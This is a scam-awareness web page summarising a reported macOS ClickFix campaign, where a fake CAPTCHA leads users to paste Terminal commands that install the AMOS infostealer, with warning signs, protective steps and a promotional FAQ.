Listen to the episode
TLDR
A new macOS ClickFix campaign tricks users into running malicious Terminal commands from a fake CAPTCHA page, silently downloading and mounting a DMG that installs the Atomic macOS Stealer (AMOS). The stealer harvests browser credentials,...
How it works
A new macOS ClickFix campaign tricks users into running malicious Terminal commands from a fake CAPTCHA page, silently downloading and mounting a DMG that installs the Atomic macOS Stealer (AMOS). The stealer harvests browser credentials,...
Red flags
- : A website asks you to open Terminal and paste a command to "verify" yourself DMG files silently mount without appearing in Finder or on the desktop Fake System Settings prompts requesting your password right after running unknown commands
What to do
- 1: Never paste commands into Terminal from web pages, even when they look like CAPTCHAs Keep macOS updated and run reputable endpoint protection
- 2block unsigned DMG launches via MDM where possible Use a dedicated password manager and hardware wallet
- 3revoke browser sessions and rotate credentials immediately if you executed such a command
Source
bleepingcomputer
Source reviewed by Mythos Forensic Team
https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/FAQ
Is New macOS ClickFix Attack Silently Mounts DMGs to Push AMOS Infostealer a real scam pattern?
Yes. Treat the message, call, or payment request as suspicious until you verify it through an official channel.
What are the first warning signs?
: A website asks you to open Terminal and paste a command to "verify" yourself DMG files silently mount without appearing in Finder or on the desktop Fake System Settings prompts requesting your password right after running unknown commands
What should I do first?
: Never paste commands into Terminal from web pages, even when they look like CAPTCHAs Keep macOS updated and run reputable endpoint protection; block unsigned DMG launches via MDM where possible Use a dedicated password manager and hardware wallet; revoke browser sessions and rotate credentials immediately if you executed such a command
Can LegalAudit check my case?
Yes. Start a free chat and paste the message, link, sender, or payment details for triage.